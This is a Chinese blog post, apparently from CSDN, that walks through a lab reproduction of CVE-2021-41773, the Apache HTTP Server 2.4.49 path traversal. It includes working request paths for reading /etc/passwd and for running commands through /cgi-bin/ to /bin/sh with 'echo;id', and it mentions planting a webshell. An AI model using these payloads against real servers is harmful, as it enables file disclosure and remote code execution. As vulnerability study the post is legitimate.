apache-httpd_2.4.49_path-traversal_CVE-2021-41773

已于 2023-09-07 22:26:58 修改
阅读量176 收藏
点赞数
分类专栏: 漏洞复现 文章标签: apache 网络安全
于 2023-09-07 22:26:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acdcccc/article/details/132747368
版权

apache-httpd_2.4.49_路径穿越漏洞_CVE-2021-41773

说明内容
漏洞编号CVE-2021-41773
漏洞名称Apache HTTP Server 2.4.49 路径穿越漏洞
漏洞评级高危
影响范围2.4.49
漏洞描述引入了一个路径穿越漏洞,穿越的目录允许被访问,可以执行任意命令
修复方案升级

漏洞描述

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:

  • 版本等于2.4.49
  • 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的)

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。

漏洞等级

高危

影响版本

  • Apache HTTP Server 2.4.49

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
Apache HTTP Server2.4.49

漏洞扫描

使用nuclei可以扫描到漏洞

./nuclei -u 192.168.117.163

在这里插入图片描述

漏洞验证

  1. 启动环境,访问主页,进行抓包

    在这里插入图片描述

  2. 访问以下目录,可以直接读到etc/passwd文件

    /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

    在这里插入图片描述

  3. 将GET包改为POST包,访问以下目录,并在最后加上命令

    /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

echo;id

    在这里插入图片描述

深度利用

命令执行

可以通过修改命令进行命令执行

GetShell

可以写入一句话木马getshell

漏洞挖掘

网络测绘

Apache HTTP Server 2.4.49

修复建议

cwangc000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3181
ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
weixin_48400575的博客
02-13 3943
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773
weixin_47311099的博客
12-07 1979
Apache HTTP Server 2.4.49 路径穿越漏洞复现(CVE-2021-41773Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的) 攻击者利用这个漏洞,可以
apache路径穿越漏洞(CVE-2021-41773
最新发布
qq_23003811的博客
07-15 305
然而,当出现 .%2e/ 或 %2e%2e/ 形式,程序就不会将其检测为路径穿越符。因此,攻击者可以使用 .%2e/ 或 %2e%2e/ 绕过程序对路径穿越符的检测,从而读取位于 Apache 服务器 web 目录以外的其他文件,或者读取 web 目录中的脚本文件源码,或者在开启了 cgi 或 cgid 的服务器上执行任意命令。当检测到路径中存在 % 字符时,若其紧跟的两个字符是十六进制字符,则程序会对其进行 url 解码,将其转换成标准字符,如 %2e 会被转换为 .。
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
weixin_42786460的博客
09-25 866
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
Apache HTTP Server 2.4.49 路径穿越,远程命令执行漏洞
cainiao17441898的博客
10-20 1732
文章目录项目场景:问题描述:原因分析:解决方案: 项目场景: Apache HTTP Server 2.4.49,2.5.0 问题描述: 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 原因分析: 远程命令执行 在httpd.conf的文件中的这俩配置,导致任意请求都能访问根目录,和cgi-bin目录。 CGI是一段程序,它运行在Server上,提供同客户端 Html页面的接口。如果它能目
apache-httpd-2.4.58-win64-VS17.zip
12-15
标题 "apache-httpd-2.4.58-win64-VS17.zip" 指的是 Apache HTTP 服务器的2.4.58版本,适用于64位Windows操作系统,并且是使用Visual Studio 2017编译的。这个压缩包包含了一系列用于在Windows平台上搭建和运行...
linux-httpd-2.4.49.tar.zip
11-23
Linux系统中的Apache HTTP服务器是世界上最广泛使用的开源Web服务器软件,其最新版本为httpd-2.4.49。这个压缩包文件“linux-httpd-2.4.49.tar.zip”包含了Apache HTTP服务器在Linux环境下的安装源代码,允许用户...
tomcat-connectors-1.2.40-windows-x86_64-httpd-2.4.x
10-31
标题中的"tomcat-connectors-1.2.40-windows-x86_64-httpd-2.4.x"指的是Tomcat服务器与Apache HTTPD服务器之间的连接器版本1.2.40,专为64位Windows系统设计,并且兼容HTTPD服务器的2.4.x版本。这个连接器,也被称为...
httpd-2.4.50.tar.gz apache
11-01
The Apache HTTP Server Project is pleased to announce the release of version 2.4.50 of the Apache HTTP Server ("Apache" and "httpd").
httpd-2.4.46-1.x86_64.tar.bz2
04-08
httpd-2.4.46-1.src.rpm httpd-2.4.46-1.x86_64.rpm httpd-devel-2.4.46-1.x86_64.rpm httpd-manual-2.4.46-1.x86_64.rpm httpd-tools-2.4.46-1.x86_64.rpm mod_authnz_ldap-2.4.46-1.x86_64.rpm mod_lua-2.4.46-1....
apache httpd-2.4.3 安装所需的包
02-27
apache httpd-2.4.3 安装所需的包,里面包含了: apache 安装包:httpd-2.4.3.tar.gz 依赖的包:apr-1.4.6.tar.gz、apr-util-1.4.1.tar.gz、pcre-8.20.tar.bz2
Apache http Server 2.4 安装与配置
weixin_34413802的博客
11-16 195
前言 Apache官网从2.2之后,不再提供windows的msi或exe安装版本,现在Apache http Server有两个分支2.2及2.4 注意事项 如果之前有安装2.2的版本,请先卸载 Apache2.4下载 1、进入apache官网:https://httpd.apache.org/download.cgi 2、选择2.4的版本,点击 Files for Micros...
Apache 2.4.49 路径穿越漏洞复现 ( CVE-2021-41773 )
qq_45396375的博客
01-04 587
Apache HTTP Server 2.4.49版本中存在一处路径穿越漏洞(CVE-2021-41773)如果配置了Require all granted,远程攻击者可以使用路径遍历攻击访问易受攻击的Web服务器上文档根目录以外的任意文件;如果Apache HTTP Server 2.4.49开启了CGI,攻击者还可构造恶意请求实现远程代码执行。
CVE-2021-41773 漏洞复现
Jay17的博客
07-13 730
CVE-2021-41773 漏洞复现
【漏洞复现】Apahce HTTPd 2.4.49CVE-2021-41773)路径穿越漏洞
中二电工吹短笛的博客
05-09 513
是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。2021年10月5日,Apache发布更新公告,修复了中的一个路径遍历和文件泄露漏洞。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。
Apache——CVE-2021-41773
qq_45770644的博客
10-06 3711
前言: Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序,该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用,它表示,并可能允许攻击者访问敏感信息。 CVE-2021-41773可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。 该问题仅影响 Apache 开源 Web 服务器的 2.4.49.
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
weixin_45260839的博客
06-03 5666
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程
W小哥
10-14 3622
一、漏洞描述 Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。 二、影响版本 Apache 2.4.49Apache 2.4.50 三、靶场准备 本实验使用vulhub环境,节约搭建时间 mkdir Docker
httpd-2.4.6-88.el7.centos.x86_64.rpm
01-09
httpd-2.4.6-88.el7.centos.x86_64.rpm是一个用于CentOS系统的httpd软件包。它是一个用于创建和管理Web服务器的软件,常用于搭建网站和提供网络服务。 该软件包的版本号为2.4.6,表示它是httpd的第二个大版本、第四个小版本、第六个补丁版本。版本号后面的88是该软件包在CentOS系统中的特定版本号,el7表示它是为CentOS 7系统编译的。x86_64表示这是一个针对64位x86架构的软件包。 安装httpd-2.4.6-88.el7.centos.x86_64.rpm将使CentOS系统具备基本的Web服务器功能。该软件包包含了用于搭建Web服务器的相关文件和程序,安装后可以启动httpd服务,让用户可以通过浏览器访问服务器上托管的网页和应用。 通过该软件包的安装和配置,用户可以搭建自己的网站、提供在线服务、建立内部网络等。这对于企业的IT系统和开发人员来说非常重要,因为Web服务器是连接和交换信息的关键设施之一。使用httpd-2.4.6-88.el7.centos.x86_64.rpm,用户可以快速搭建和部署自己的网络服务,为用户和客户提供更好的体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值